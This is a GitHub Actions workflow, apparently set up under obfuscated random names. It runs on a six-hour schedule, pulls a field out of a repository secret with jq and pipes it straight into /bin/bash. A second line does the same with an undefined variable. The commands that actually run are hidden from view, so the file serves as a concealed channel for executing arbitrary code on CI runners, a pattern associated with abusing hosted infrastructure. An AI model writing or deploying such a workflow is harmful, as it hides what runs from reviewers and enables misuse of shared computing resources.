name: duanyongchang8769
on:
  workflow_dispatch:
  schedule:
    - cron: '13 0/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: duanyongchang8769
        env:
          rq44930: ${{ secrets.rq44930 }}
        run: |
          echo $rq44930 | jq -r .enxn2 | /bin/bash
          echo $vmg0737 | jq -r .d8 | /bin/bash

